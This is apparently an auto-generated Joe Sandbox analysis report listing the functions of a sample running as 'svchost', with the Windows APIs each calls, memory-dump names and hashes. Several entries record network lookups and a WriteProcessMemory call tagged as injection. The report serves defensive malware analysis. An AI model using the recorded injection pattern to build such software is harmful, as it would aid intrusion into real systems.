Instruction ID: 04baafabb85ef5c752686726c093db061e42867f807bf42f4ef44dac0b2fe2da
Opcode Fuzzy Hash: ed4153d8dbd31d6f314157dcbdedce6db1cc8a59a21d44a72ca7804b43617e2e
Instruction Fuzzy Hash: 47414D72205A8082EE62CF26E8503AA67A1FB8DFD9F044156EF8E577B9DF39C545C700

Function 00000001400075C0 Relevance: 9.1, APIs: 6, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000D420: WinHttpOpen.WINHTTP ref: 000000014000D49C

memset.MSVCRT ref: 000000014000761C
memset.MSVCRT ref: 0000000140007630

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

??2@YAPEAX_K@Z.MSVCRT ref: 000000014000768D
_time64.MSVCRT ref: 00000001400076CF
HeapFree.KERNEL32 ref: 00000001400076F9
_time64.MSVCRT ref: 000000014000770F

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: memset$_time64$??2@AddressFreeHeapHttpLibraryLoadOpenProc
String ID:
API String ID: 3106453554-0
Opcode ID: 8d1d217a09c486184b67123d1f67058338c9e71b8c42690334822dbe439251cf
Instruction ID: 8b04f6f2c231c0026719b809a071ef14e3336b76cfd83b8ab9bcfbeb16143b4b
Opcode Fuzzy Hash: 8d1d217a09c486184b67123d1f67058338c9e71b8c42690334822dbe439251cf
Instruction Fuzzy Hash: B7415BB2610B8082E756DF26F8543DA33A4FB48BC8F544129EB8D077A6DF39C555C780

Function 000000014000EF60 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 000000014000EF92
HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000EFB0
HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000EFCB
HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F019
HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F049
HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F067

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$Heap$String
String ID:
API String ID: 2419388322-0
Opcode ID: be6e7307092a1a952a652f78f7010cba9a840ae09ac9c62c558f82d271d8ae95
Instruction ID: 2e050d31a97349d7cdf6a2b87fb76f8c7cecf5345a2535d832a4d2139c467b61
Opcode Fuzzy Hash: be6e7307092a1a952a652f78f7010cba9a840ae09ac9c62c558f82d271d8ae95
Instruction Fuzzy Hash: 9031F775201B8182EB96DF67E8503EA23A4F78DBC4F045126EB8A577B6CF39C8858750

Function 0000000140005D00 Relevance: 9.1, APIs: 6, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 0000000140005D1F
HeapFree.KERNEL32(?,?,?,?,00000001400050AC), ref: 0000000140005D5B
HeapFree.KERNEL32(?,?,?,?,00000001400050AC), ref: 0000000140005D8B
HeapFree.KERNEL32(?,?,?,?,00000001400050AC), ref: 0000000140005DA6
HeapFree.KERNEL32(?,?,?,?,00000001400050AC), ref: 0000000140005DC1
HeapFree.KERNEL32(?,?,?,?,00000001400050AC), ref: 0000000140005DDC

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$Heap$String
String ID:
API String ID: 2419388322-0
Opcode ID: e9e0e31790792d4b0a460b2c6ecab48ab662761ac68e47726af6c54c1e2625d8
Instruction ID: 77b78661734df3ff0c0ddf4feed43cefbfa98e925e832546ec525beed8cc0a7a
Opcode Fuzzy Hash: e9e0e31790792d4b0a460b2c6ecab48ab662761ac68e47726af6c54c1e2625d8
Instruction Fuzzy Hash: 1F310675200B8582EB96EF57E84439A23A4F78DFC5F44411AEF8E5776ACE39C885C740

Function 0000000140008760 Relevance: 9.0, APIs: 7, Instructions: 285memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 0000000140008848
HeapFree.KERNEL32 ref: 000000014000886F
HeapFree.KERNEL32 ref: 0000000140008889
HeapFree.KERNEL32 ref: 00000001400088AB
HeapFree.KERNEL32 ref: 00000001400088CD
HeapFree.KERNEL32 ref: 00000001400088E7

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 768fc2b4c23c74d1e8dfd13da3aa98bb1163e70c91c34df0f9885c6c67c5b0d5
Instruction ID: cef34096d4367dcbd8395c8382d480f973210d14fd31fa0a13d25510343ea6c8
Opcode Fuzzy Hash: 768fc2b4c23c74d1e8dfd13da3aa98bb1163e70c91c34df0f9885c6c67c5b0d5
Instruction Fuzzy Hash: B2C16EB2200B8585EB62DF13A8407EA63A4F749BC8F44812AEF8D47BA5DF39C945C744

Function 0000000140015930 Relevance: 9.0, APIs: 7, Instructions: 207memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000140015981
HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015B76
HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015B90
HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015BAF
HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015BCE
HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015BE8
HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015C02

Part of subcall function 000000014000CAF0: HeapFree.KERNEL32(?,?,00000000,000000014000DD66), ref: 000000014000CBAA

Part of subcall function 000000014000BFE0: HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000001400166BE), ref: 000000014000C080

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$memset
String ID:
API String ID: 631287834-0
Opcode ID: 24f8cd55a8a0ef05f4e9c24f79871f4228e885fe3935998ed1778025e6330dd8
Instruction ID: aed008c8da3fdc3c0ff40e812c2c567fdf27eb098b86fed716892b971eaa37ac
Opcode Fuzzy Hash: 24f8cd55a8a0ef05f4e9c24f79871f4228e885fe3935998ed1778025e6330dd8
Instruction Fuzzy Hash: 1281A231209784C5EAA6AB17A4803DAA794FB8DFC5F484115BF8D4FBB6DF3AC9058301

Function 000000014000B4C0 Relevance: 7.7, APIs: 5, Instructions: 185COMMON

Download Yara Rule

APIs

Part of subcall function 000000014000B420: HeapFree.KERNEL32 ref: 000000014000B459
Part of subcall function 000000014000B420: HeapFree.KERNEL32 ref: 000000014000B489
Part of subcall function 000000014000B420: HeapFree.KERNEL32 ref: 000000014000B4A9

SysFreeString.OLEAUT32 ref: 000000014000B5EC
SysFreeString.OLEAUT32 ref: 000000014000B605
_wtoi.MSVCRT ref: 000000014000B6AE

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$Heap$String$_wtoi
String ID:
API String ID: 2561507145-0
Opcode ID: 709da4c65bf113dccac99deeb3e18ea81a70b0b280e06bd9e3454a5568221bd6
Instruction ID: e59cfff288119f3f4f904d1b27c58b2d2babdf164cacf3d3f2fd8ee1a5d65ac5
Opcode Fuzzy Hash: 709da4c65bf113dccac99deeb3e18ea81a70b0b280e06bd9e3454a5568221bd6
Instruction Fuzzy Hash: F9914FB6305AC585EB61CF26E8503ED23A0FB88BC9F445066EB4D4BA68DF39C645C714

Function 0000000140017720 Relevance: 7.7, APIs: 5, Instructions: 155COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 000000014001784C
SysFreeString.OLEAUT32 ref: 000000014001785E
_wtoi.MSVCRT ref: 000000014001790E

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeString$_wtoi
String ID:
API String ID: 4250654029-0
Opcode ID: 023a85d6e077abd36e9329ed64bb1b78fc74f23c4d0e9b6e5c5425238926549f
Instruction ID: b8226e3e0012d67e1dc081339e365a2b865a11d34d73dc99bed016e2b2b4d587
Opcode Fuzzy Hash: 023a85d6e077abd36e9329ed64bb1b78fc74f23c4d0e9b6e5c5425238926549f
Instruction Fuzzy Hash: 5871F972301AC585EB628F26D8507ED63B0FB88BC9F449166EB4D4BA68DF36C649C314

Function 0000000140004C00 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 0000000140004C66
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004D6F

Part of subcall function 0000000140002300: CoCreateInstance.COMBASE ref: 0000000140002351

_time64.MSVCRT ref: 0000000140004DA2
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004DD9
HeapFree.KERNEL32 ref: 0000000140004DF5

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: ??3@$??2@CreateFreeHeapInstance_time64
String ID:
API String ID: 2253682078-0
Opcode ID: 6cc538e5723be706a6af699680bb8817cd703871eebb125ad8ef8b60cd1c5036
Instruction ID: 338fadbd8f023c31d53e71c2eb0ac7eaa7af4c98eb419c843f7b01db399d984e
Opcode Fuzzy Hash: 6cc538e5723be706a6af699680bb8817cd703871eebb125ad8ef8b60cd1c5036
Instruction Fuzzy Hash: B3515CB2200A8496EB62DF13E9907EA73A4F74CBC4F44412AEB8D47BA5DF38D955C700

Function 000000014000ABD0 Relevance: 7.6, APIs: 5, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

_wtoi.MSVCRT ref: 000000014000AC62
HeapFree.KERNEL32(?,?,?,00000000,?,00000000,?,0000000140007DE7), ref: 000000014000AD15
HeapFree.KERNEL32(?,?,?,00000000,?,00000000,?,0000000140007DE7), ref: 000000014000AD45
HeapFree.KERNEL32(?,?,?,00000000,?,00000000,?,0000000140007DE7), ref: 000000014000AD62

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$_wtoi
String ID:
API String ID: 500119451-0
Opcode ID: c53852b301343a864bd44e2a01ece7f0478238a795bbedb566b2e1c3994f532d
Instruction ID: 92a92d2dbc5a60d20047751ba9c7231f8b4528c9a95bff77d31fe694f9f08b5a
Opcode Fuzzy Hash: c53852b301343a864bd44e2a01ece7f0478238a795bbedb566b2e1c3994f532d
Instruction Fuzzy Hash: 93417272201B4486F762DB57B8407EA66E0F78DBD8F458126EF4E47BA5DE3CC9858300

Function 0000000140005916 Relevance: 7.6, APIs: 5, Instructions: 98memorynetworkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 0000000140005A00
freeaddrinfo.WS2_32 ref: 0000000140005A73
HeapFree.KERNEL32 ref: 0000000140005A8D
HeapFree.KERNEL32 ref: 0000000140005AAF
WSACleanup.WS2_32 ref: 0000000140005AB5

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$Cleanupfreeaddrinfogetaddrinfo
String ID:
API String ID: 2229396415-0
Opcode ID: ad0a23ea1e3fab2e2f6dc1923229d74a235e8ba483d88328893647dd137214c9
Instruction ID: c73f167c002d392f22e7535e3b766fe4c5e56fea1bafe15927e8d13a21d43fb0
Opcode Fuzzy Hash: ad0a23ea1e3fab2e2f6dc1923229d74a235e8ba483d88328893647dd137214c9
Instruction Fuzzy Hash: C1418C76205BC085EB62DF62A8503EB73A0FB8EB89F404116EB8E47B69DF39C545C741

Function 0000000140006BF0 Relevance: 7.6, APIs: 5, Instructions: 76networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 0000000140006C17
gethostname.WS2_32 ref: 0000000140006C3D
freeaddrinfo.WS2_32 ref: 0000000140006CF8
WSACleanup.WS2_32 ref: 0000000140006CFE

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: CleanupStartupfreeaddrinfogethostname
String ID:
API String ID: 252301257-0
Opcode ID: 1c7de7a7b739ff876f72758fab879ef31b66a72eb6dc2b419f8a8539415d4b0c
Instruction ID: 01925c6db1f8f3f86d9a40cb054dce826a2e1fef095a07c98b455f9550f0be45
Opcode Fuzzy Hash: 1c7de7a7b739ff876f72758fab879ef31b66a72eb6dc2b419f8a8539415d4b0c
Instruction Fuzzy Hash: D13132F12047C592FA72CB36B448BF963A3F38D7D0F544226AB95676E5CB38C895C610

Function 0000000140010C46 Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 0000000140010D20
SysFreeString.OLEAUT32 ref: 0000000140010D2E
SysFreeString.OLEAUT32 ref: 0000000140010D63
SysFreeString.OLEAUT32 ref: 0000000140010D6D
HeapFree.KERNEL32 ref: 0000000140010D90

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$String$Heap
String ID:
API String ID: 4134718113-0
Opcode ID: 33a2060611cb8ec44a2f8ebbf3682c4b7cf822d20eecf976d1becbd4f745dd5e
Instruction ID: c7057bfe3fe1e259c7d9473786c2c13687bc0f68ae7fd6a9205dd21598a37846
Opcode Fuzzy Hash: 33a2060611cb8ec44a2f8ebbf3682c4b7cf822d20eecf976d1becbd4f745dd5e
Instruction Fuzzy Hash: 25218E36301A5082EE53DB67E8503AA6360FB8DFD9F144161EF8A4B774DE7AC849C700

Function 0000000140010B96 Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 0000000140010D20
SysFreeString.OLEAUT32 ref: 0000000140010D2E
SysFreeString.OLEAUT32 ref: 0000000140010D63
SysFreeString.OLEAUT32 ref: 0000000140010D6D
HeapFree.KERNEL32 ref: 0000000140010D90

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$String$Heap
String ID:
API String ID: 4134718113-0
Opcode ID: fccf0d1d76b4618596f9da56fba9d61feb00287a7068e73cca5b6a5a2edeb918
Instruction ID: 44dffc1b1623a4eb4a0fa9f924ccce8fcb8cef9b766d2aa3702618fef56f5325
Opcode Fuzzy Hash: fccf0d1d76b4618596f9da56fba9d61feb00287a7068e73cca5b6a5a2edeb918
Instruction Fuzzy Hash: A521503630165482EE53DB67E5903AA6360FB8DFD9F044565AF8A4B774DF7AC845C300

Function 00000001400167E0 Relevance: 7.6, APIs: 5, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400162A0: GetFullPathNameW.KERNEL32 ref: 0000000140016398

_time64.MSVCRT ref: 0000000140016829

Part of subcall function 0000000140015C30: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,?,?,?,00000000,00000001400152AB), ref: 0000000140015C5B
Part of subcall function 0000000140015C30: HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000001400152AB), ref: 0000000140015CA0
Part of subcall function 0000000140015C30: ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,00000000,00000001400152AB), ref: 0000000140015CBA

Part of subcall function 000000014000EF60: SysFreeString.OLEAUT32 ref: 000000014000EF92
Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000EFB0
Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000EFCB
Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F019
Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F049
Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F067

??3@YAXPEAX@Z.MSVCRT ref: 000000014001685F

Part of subcall function 0000000140015CF0: HeapFree.KERNEL32 ref: 0000000140015D5C
Part of subcall function 0000000140015CF0: HeapFree.KERNEL32 ref: 0000000140015DC9

_time64.MSVCRT ref: 000000014001687A
??3@YAXPEAX@Z.MSVCRT ref: 00000001400168A5
HeapFree.KERNEL32 ref: 00000001400168BF

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$Heap$??3@$_time64$??2@FullNamePathString
String ID:
API String ID: 150110825-0
Opcode ID: b374972345a98aab7f111945121116fe8a8daca0d979d4b2eb55e00bc1de3434
Instruction ID: 3471c3c0471e6186058520ccdacb3bb8f8d6888c7ecbf9f9485eb0a86c61140c
Opcode Fuzzy Hash: b374972345a98aab7f111945121116fe8a8daca0d979d4b2eb55e00bc1de3434
Instruction Fuzzy Hash: F4216F31215B8582FE56EB63A8143EA63A0EB8DBC0F440125FF4E0B7B9DF3DC8018240

Function 00000001400182FC Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000000140018333
GetCurrentProcessId.KERNEL32 ref: 000000014001833E
GetCurrentThreadId.KERNEL32 ref: 000000014001834A
GetTickCount.KERNEL32 ref: 0000000140018356
QueryPerformanceCounter.KERNEL32 ref: 0000000140018367

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: ca367986e5882e155562448106f5efe6e8986abbd5978ec8722d427d7b5e0517
Instruction ID: 4282b2ffed1f1902788247a1ead55fe5c5022d60fe0a4bff3f2e92ceacb5a284
Opcode Fuzzy Hash: ca367986e5882e155562448106f5efe6e8986abbd5978ec8722d427d7b5e0517
Instruction Fuzzy Hash: CC012D31215B4486FB928F22E9843956360F74DBD0F446624FFAE4B7B4DA3DCA998740

Function 0000000140013800 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144memoryinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

WriteProcessMemory.KERNEL32 ref: 000000014001392E
VirtualFreeEx.KERNEL32 ref: 0000000140013A4C
HeapFree.KERNEL32 ref: 0000000140013A62

Strings

@, xrefs: 00000001400138EE

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$AddressHeapLibraryLoadMemoryProcProcessVirtualWrite
String ID: @
API String ID: 3124392466-2766056989
Opcode ID: 1bb38f2ae01ba480db47f1e073e612a7f6dc02e3a34142393fbfcebefcc833bd
Instruction ID: b2a891423e6191926618ad547ba0af25c79efd8fa3015ad4a40756f249b59b8a
Opcode Fuzzy Hash: 1bb38f2ae01ba480db47f1e073e612a7f6dc02e3a34142393fbfcebefcc833bd
Instruction Fuzzy Hash: 3B612A32205BC585EB618F12E8507DAA3A4F788BD8F444026EFCD5BB69DF39C555CB00

Function 000000014000B180 Relevance: 6.4, APIs: 5, Instructions: 148memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00000001400086EA), ref: 000000014000B2CD
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00000001400086EA), ref: 000000014000B2F8
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00000001400086EA), ref: 000000014000B328

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
